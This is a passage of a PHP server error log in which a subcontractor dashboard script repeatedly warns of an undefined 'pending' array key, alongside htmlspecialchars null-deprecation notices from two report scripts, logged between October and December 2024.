/home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 05:23:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 05:43:21 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 06:33:20 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 06:42:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 08:02:04 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 08:07:54 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 10:16:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 11:16:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 11:19:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 12:11:17 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 23:36:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 23:39:57 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 01:12:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 01:31:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 01:50:28 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:22:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:26:47 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:41:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:41:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:52:02 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:58:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 03:39:56 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 05:14:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 05:27:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 05:46:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 06:28:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 06:36:19 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 06:39:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 07:36:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 08:07:02 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 08:41:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 09:30:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 10:37:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 10:37:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 10:39:14 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [06-Oct-2024 03:58:39 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 01:20:30 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 01:56:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 02:15:17 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 02:39:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 02:43:28 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 12:25:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 12:25:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 12:26:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 12:26:34 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 12:27:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 23:14:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [08-Oct-2024 00:52:39 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Oct-2024 05:34:10 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [18-Oct-2024 01:24:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [19-Oct-2024 04:16:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [19-Oct-2024 04:29:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [21-Oct-2024 04:56:54 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Oct-2024 03:25:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Oct-2024 03:29:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Oct-2024 03:38:09 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Oct-2024 03:38:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Oct-2024 06:58:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [28-Oct-2024 00:26:47 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:05:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:06:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:07:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:10:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [06-Nov-2024 14:10:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [06-Nov-2024 14:10:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:11:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:13:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [06-Nov-2024 14:13:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [06-Nov-2024 23:23:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Nov-2024 00:28:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Nov-2024 00:31:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Nov-2024 00:43:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Nov-2024 00:44:03 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [26-Nov-2024 00:44:03 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [26-Nov-2024 00:44:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [26-Nov-2024 00:44:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [26-Nov-2024 00:44:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [26-Nov-2024 00:44:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [26-Nov-2024 03:36:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Nov-2024 03:40:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [02-Dec-2024 04:29:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [02-Dec-2024 04:29:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [02-Dec-2024 04:29:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [02-Dec-2024 04:29:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [02-Dec-2024 04:30:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [02-Dec-2024 04:30:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [02-Dec-2024 04:30:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [02-Dec-2024 04:30:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [03-Dec-2024 08:25:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [03-Dec-2024 08:25:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [03-Dec-2024 08:25:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [03-Dec-2024 08:26:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [03-Dec-2024 08:26:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [03-Dec-2024 08:28:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [03-Dec-2024 08:28:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [03-Dec-2024 08:28:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [03-Dec-2024 08:28:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [03-Dec-2024 08:28:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [03-Dec-2024 08:28:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [03-Dec-2024 08:39:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [03-Dec-2024 08:40:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [03-Dec-2024 08:40:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [05-Dec-2024 04:39:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Dec-2024 04:39:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [05-Dec-2024 04:39:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [05-Dec-2024 04:39:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [05-Dec-2024 04:39:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [05-Dec-2024 04:39:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [05-Dec-2024 04:39:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [05-Dec-2024 11:09:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Dec-2024 00:31:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Dec-2024 00:31:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Dec-2024 00:32:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Dec-2024 00:33:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [06-Dec-2024 00:33:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [06-Dec-2024 00:34:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [06-Dec-2024 00:34:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [06-Dec-2024 00:43:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 09:57:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 09:57:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 10:00:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 10:00:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 10:00:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 10:02:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 10:15:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 10:23:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 10:23:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 05:44:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 07:32:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 14:54:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 14:55:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 14:55:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 14:55:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 14:57:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 15:15:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 15:16:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 15:17:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 15:17:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 15:17:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 15:18:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 15:19:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 15:19:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 15:29:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 15:29:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 22:59:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 23:01:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 23:04:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Dec-2024 23:34:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 00:26:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 01:22:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 02:49:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 09:29:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 09:38:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 22:08:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 22:57:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 23:13:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [09-Dec-2024 23:13:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [09-Dec-2024 23:13:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Dec-2024 23:13:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Dec-2024 23:14:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 23:32:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 23:37:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 23:37:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Dec-2024 23:40:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Dec-2024 00:46:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Dec-2024 06:35:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Dec-2024 23:11:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 00:33:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 00:33:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 00:34:33 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [13-Dec-2024 00:34:33 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [13-Dec-2024 00:38:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 00:42:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 00:44:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 00:47:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 00:48:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 00:54:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 00:57:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 01:07:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Dec-2024 03:29:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Dec-2024 22:53:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Dec-2024 04:10:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Dec-2024 09:43:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Dec-2024 00:42:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Dec-2024 08:14:04 UTC] 